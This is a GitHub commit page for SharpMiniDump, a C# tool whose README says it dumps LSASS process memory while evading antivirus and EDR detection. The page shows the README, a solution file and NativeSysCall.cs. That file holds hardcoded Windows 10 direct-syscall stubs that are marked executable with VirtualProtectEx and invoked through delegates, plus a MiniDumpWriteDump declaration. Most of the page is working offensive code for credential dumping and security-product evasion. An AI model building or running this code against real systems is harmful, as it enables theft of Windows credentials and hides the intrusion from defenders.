Skip to content

Commit d030836

Browse files
b4rtikb4rtik
committed
First commit
1 parent 5efbaa2 commit d030836

File tree

7 files changed

+1604
-0
lines changed

7 files changed

+1604
-0
lines changed

README.md

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,10 @@
11
# SharpMiniDump
2+
3+
Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses: dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection.
4+
5+
SharpMiniDump is a rough port of this project [Dumpert](https://github.com/outflanknl/Dumpert) by [@Cn33liz](https://twitter.com/Cneelis) and you will find the detail in this [post](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/), so BIG credits to him.
6+
7+
Other credits go to [@cobbr_io](https://twitter.com/cobbr_io) and [@TheRealWover](https://twitter.com/TheRealWover) for their work on [SharpSploit](https://github.com/cobbr/SharpSploit) (Execution / DynamicInvoke)
8+
9+
210

SharpMiniDump.sln

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
2+
Microsoft Visual Studio Solution File, Format Version 12.00
3+
# Visual Studio 15
4+
VisualStudioVersion = 15.0.28307.136
5+
MinimumVisualStudioVersion = 10.0.40219.1
6+
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpMiniDump", "SharpMiniDump\SharpMiniDump.csproj", "{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}"
7+
EndProject
8+
Global
9+
GlobalSection(SolutionConfigurationPlatforms) = preSolution
10+
Debug|Any CPU = Debug|Any CPU
11+
Debug|x64 = Debug|x64
12+
Release|Any CPU = Release|Any CPU
13+
Release|x64 = Release|x64
14+
EndGlobalSection
15+
GlobalSection(ProjectConfigurationPlatforms) = postSolution
16+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|Any CPU.Build.0 = Debug|Any CPU
18+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|x64.ActiveCfg = Debug|x64
19+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Debug|x64.Build.0 = Debug|x64
20+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|Any CPU.ActiveCfg = Release|Any CPU
21+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|Any CPU.Build.0 = Release|Any CPU
22+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|x64.ActiveCfg = Release|x64
23+
{6FFCCF81-6C3C-4D3F-B15F-35A86D0B497F}.Release|x64.Build.0 = Release|x64
24+
EndGlobalSection
25+
GlobalSection(SolutionProperties) = preSolution
26+
HideSolutionNode = FALSE
27+
EndGlobalSection
28+
GlobalSection(ExtensibilityGlobals) = postSolution
29+
SolutionGuid = {C4236FC6-7C6F-413C-9583-2CF9548B531E}
30+
EndGlobalSection
31+
EndGlobal

SharpMiniDump/NativeSysCall.cs

Lines changed: 345 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,345 @@
1+
using System;
2+
using System.Collections.Generic;
3+
using System.ComponentModel;
4+
using System.Diagnostics;
5+
using System.Linq;
6+
using System.Runtime.InteropServices;
7+
using System.Security;
8+
using System.Text;
9+
using static SharpMiniDump.Natives;
10+
11+
namespace SharpMiniDump
12+
{
13+
class NativeSysCall
14+
{
15+
/// 0: 49 89 ca mov r10,rcx
16+
/// 3: b8 0f 00 00 00 mov eax,0x0f
17+
/// 8: 0f 05 syscall
18+
/// a: c3 ret
19+
20+
static byte[] bZwClose10 = { 0x49, 0x89, 0xCA, 0xB8, 0x0F, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
21+
22+
/// 0: 49 89 ca mov r10,rcx
23+
/// 3: b8 0f 00 00 00 mov eax,0x3A
24+
/// 8: 0f 05 syscall
25+
/// a: c3 ret
26+
27+
static byte[] bZwWriteVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x3A, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
28+
29+
/// 0: 49 89 ca mov r10,rcx
30+
/// 3: b8 0f 00 00 00 mov eax,0x50
31+
/// 8: 0f 05 syscall
32+
/// a: c3 ret
33+
34+
static byte[] bZwProtectVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x50, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
35+
36+
/// 0: 49 89 ca mov r10,rcx
37+
/// 3: b8 0f 00 00 00 mov eax,0x36
38+
/// 8: 0f 05 syscall
39+
/// a: c3 ret
40+
41+
static byte[] bZwQuerySystemInformation10 = { 0x49, 0x89, 0xCA, 0xB8, 0x36, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
42+
43+
/// 0: 49 89 ca mov r10,rcx
44+
/// 3: b8 0f 00 00 00 mov eax,0x18
45+
/// 8: 0f 05 syscall
46+
/// a: c3 ret
47+
48+
static byte[] bNtAllocateVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x18, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
49+
50+
/// 0: 49 89 ca mov r10,rcx
51+
/// 3: b8 0f 00 00 00 mov eax,0x1E
52+
/// 8: 0f 05 syscall
53+
/// a: c3 ret
54+
55+
static byte[] bNtFreeVirtualMemory10 = { 0x49, 0x89, 0xCA, 0xB8, 0x1E, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
56+
57+
/// 0: 49 89 ca mov r10,rcx
58+
/// 3: b8 0f 00 00 00 mov eax,0x55
59+
/// 8: 0f 05 syscall
60+
/// a: c3 ret
61+
62+
static byte[] bNtCreateFile10 = { 0x49, 0x89, 0xCA, 0xB8, 0x55, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
63+
64+
///0: 49 89 ca mov r10,rcx
65+
///3: b8 26 00 00 00 mov eax,0x26
66+
///8: 0f 05 syscall
67+
///a: c3 ret
68+
69+
static byte[] bZwOpenProcess10 = { 0x49, 0x89, 0xCA, 0xB8, 0x26, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
70+
71+
public static NTSTATUS ZwOpenProcess10(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid)
72+
{
73+
byte[] syscall = bZwOpenProcess10;
74+
75+
unsafe
76+
{
77+
fixed (byte* ptr = syscall)
78+
{
79+
80+
IntPtr memoryAddress = (IntPtr)ptr;
81+
82+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
83+
(UIntPtr)syscall.Length, 0x40 , out uint oldprotect))
84+
{
85+
throw new Win32Exception();
86+
}
87+
88+
Delegates.ZwOpenProcess myAssemblyFunction = (Delegates.ZwOpenProcess)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwOpenProcess));
89+
90+
return (NTSTATUS)myAssemblyFunction(out hProcess, processAccess, objAttribute, ref clientid);
91+
}
92+
}
93+
}
94+
95+
public static NTSTATUS ZwClose10(IntPtr handle)
96+
{
97+
byte[] syscall = bZwClose10;
98+
99+
unsafe
100+
{
101+
fixed (byte* ptr = syscall)
102+
{
103+
104+
IntPtr memoryAddress = (IntPtr)ptr;
105+
106+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
107+
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
108+
{
109+
throw new Win32Exception();
110+
}
111+
112+
Delegates.ZwClose myAssemblyFunction = (Delegates.ZwClose)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwClose));
113+
114+
return (NTSTATUS)myAssemblyFunction(handle);
115+
}
116+
}
117+
}
118+
119+
public static NTSTATUS ZwWriteVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten)
120+
{
121+
byte[] syscall = bZwWriteVirtualMemory10;
122+
123+
unsafe
124+
{
125+
fixed (byte* ptr = syscall)
126+
{
127+
128+
IntPtr memoryAddress = (IntPtr)ptr;
129+
130+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
131+
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
132+
{
133+
throw new Win32Exception();
134+
}
135+
136+
Delegates.ZwWriteVirtualMemory myAssemblyFunction = (Delegates.ZwWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwWriteVirtualMemory));
137+
138+
return (NTSTATUS)myAssemblyFunction(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten);
139+
}
140+
}
141+
}
142+
143+
public static NTSTATUS ZwProtectVirtualMemory10(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten)
144+
{
145+
byte[] syscall = bZwProtectVirtualMemory10;
146+
147+
unsafe
148+
{
149+
fixed (byte* ptr = syscall)
150+
{
151+
152+
IntPtr memoryAddress = (IntPtr)ptr;
153+
154+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
155+
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
156+
{
157+
throw new Win32Exception();
158+
}
159+
160+
Delegates.ZwProtectVirtualMemory myAssemblyFunction = (Delegates.ZwProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwProtectVirtualMemory));
161+
162+
return (NTSTATUS)myAssemblyFunction(hProcess, ref lpBaseAddress, ref NumberOfBytesToProtect, NewAccessProtection, ref lpNumberOfBytesWritten);
163+
}
164+
}
165+
}
166+
167+
public static NTSTATUS ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength)
168+
{
169+
byte[] syscall = bZwQuerySystemInformation10;
170+
171+
unsafe
172+
{
173+
fixed (byte* ptr = syscall)
174+
{
175+
176+
IntPtr memoryAddress = (IntPtr)ptr;
177+
178+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
179+
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
180+
{
181+
throw new Win32Exception();
182+
}
183+
184+
Delegates.ZwQuerySystemInformation myAssemblyFunction = (Delegates.ZwQuerySystemInformation)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.ZwQuerySystemInformation));
185+
186+
return (NTSTATUS)myAssemblyFunction(SystemInformationClass, SystemInformation, SystemInformationLength, ref ReturnLength);
187+
}
188+
}
189+
}
190+
191+
public static NTSTATUS NtAllocateVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect)
192+
{
193+
byte[] syscall = bNtAllocateVirtualMemory10;
194+
195+
unsafe
196+
{
197+
fixed (byte* ptr = syscall)
198+
{
199+
200+
IntPtr memoryAddress = (IntPtr)ptr;
201+
202+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
203+
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
204+
{
205+
throw new Win32Exception();
206+
}
207+
208+
Delegates.NtAllocateVirtualMemory myAssemblyFunction = (Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtAllocateVirtualMemory));
209+
210+
return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect);
211+
}
212+
}
213+
}
214+
215+
public static NTSTATUS NtFreeVirtualMemory10(IntPtr hProcess, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType)
216+
{
217+
byte[] syscall = bNtFreeVirtualMemory10;
218+
219+
unsafe
220+
{
221+
fixed (byte* ptr = syscall)
222+
{
223+
224+
IntPtr memoryAddress = (IntPtr)ptr;
225+
226+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
227+
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
228+
{
229+
throw new Win32Exception();
230+
}
231+
232+
Delegates.NtFreeVirtualMemory myAssemblyFunction = (Delegates.NtFreeVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtFreeVirtualMemory));
233+
234+
return (NTSTATUS)myAssemblyFunction(hProcess, ref BaseAddress, ref RegionSize, FreeType);
235+
}
236+
}
237+
}
238+
239+
public static NTSTATUS NtCreateFile10(out Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle,
240+
Int32 desiredAccess,
241+
ref OBJECT_ATTRIBUTES objectAttributes,
242+
out IO_STATUS_BLOCK ioStatusBlock,
243+
ref Int64 allocationSize,
244+
UInt32 fileAttributes,
245+
System.IO.FileShare shareAccess,
246+
UInt32 createDisposition,
247+
UInt32 createOptions,
248+
IntPtr eaBuffer,
249+
UInt32 eaLength)
250+
{
251+
byte[] syscall = bNtCreateFile10;
252+
253+
unsafe
254+
{
255+
fixed (byte* ptr = syscall)
256+
{
257+
258+
IntPtr memoryAddress = (IntPtr)ptr;
259+
260+
if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
261+
(UIntPtr)syscall.Length, 0x40, out uint oldprotect))
262+
{
263+
throw new Win32Exception();
264+
}
265+
266+
Delegates.NtCreateFile myAssemblyFunction = (Delegates.NtCreateFile)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(Delegates.NtCreateFile));
267+
268+
return (NTSTATUS)myAssemblyFunction(out fileHandle,
269+
desiredAccess,
270+
ref objectAttributes,
271+
out ioStatusBlock,
272+
ref allocationSize,
273+
fileAttributes,
274+
shareAccess,
275+
createDisposition,
276+
createOptions,
277+
eaBuffer,
278+
eaLength);
279+
}
280+
}
281+
}
282+
283+
public struct Delegates
284+
{
285+
[SuppressUnmanagedCodeSecurity]
286+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
287+
public delegate int ZwOpenProcess(out IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid);
288+
289+
[SuppressUnmanagedCodeSecurity]
290+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
291+
public delegate int ZwClose(IntPtr handle);
292+
293+
[SuppressUnmanagedCodeSecurity]
294+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
295+
public delegate int ZwWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);
296+
297+
[SuppressUnmanagedCodeSecurity]
298+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
299+
public delegate int ZwProtectVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, ref uint NumberOfBytesToProtect, uint NewAccessProtection, ref uint lpNumberOfBytesWritten);
300+
301+
[SuppressUnmanagedCodeSecurity]
302+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
303+
public delegate int ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, IntPtr SystemInformation, uint SystemInformationLength, ref uint ReturnLength);
304+
305+
[SuppressUnmanagedCodeSecurity]
306+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
307+
public delegate int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect);
308+
309+
[SuppressUnmanagedCodeSecurity]
310+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
311+
public delegate int NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, ulong FreeType);
312+
313+
[SuppressUnmanagedCodeSecurity]
314+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
315+
public delegate int NtCreateFile(out Microsoft.Win32.SafeHandles.SafeFileHandle fileHandle,
316+
Int32 desiredAccess,
317+
ref OBJECT_ATTRIBUTES objectAttributes,
318+
out IO_STATUS_BLOCK ioStatusBlock,
319+
ref Int64 allocationSize,
320+
UInt32 fileAttributes,
321+
System.IO.FileShare shareAccess,
322+
UInt32 createDisposition,
323+
UInt32 createOptions,
324+
IntPtr eaBuffer,
325+
UInt32 eaLength);
326+
327+
[SuppressUnmanagedCodeSecurity]
328+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
329+
public delegate bool RtlEqualUnicodeString(UNICODE_STRING String1, UNICODE_STRING String2, bool CaseInSensitive);
330+
331+
[SuppressUnmanagedCodeSecurity]
332+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
333+
public delegate bool RtlGetVersion(ref OSVERSIONINFOEXW lpVersionInformation);
334+
335+
[SuppressUnmanagedCodeSecurity]
336+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
337+
public delegate bool RtlInitUnicodeString(ref UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString);
338+
339+
[SuppressUnmanagedCodeSecurity]
340+
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
341+
public delegate bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
342+
343+
}
344+
}
345+
}

0 commit comments

Comments
 (0)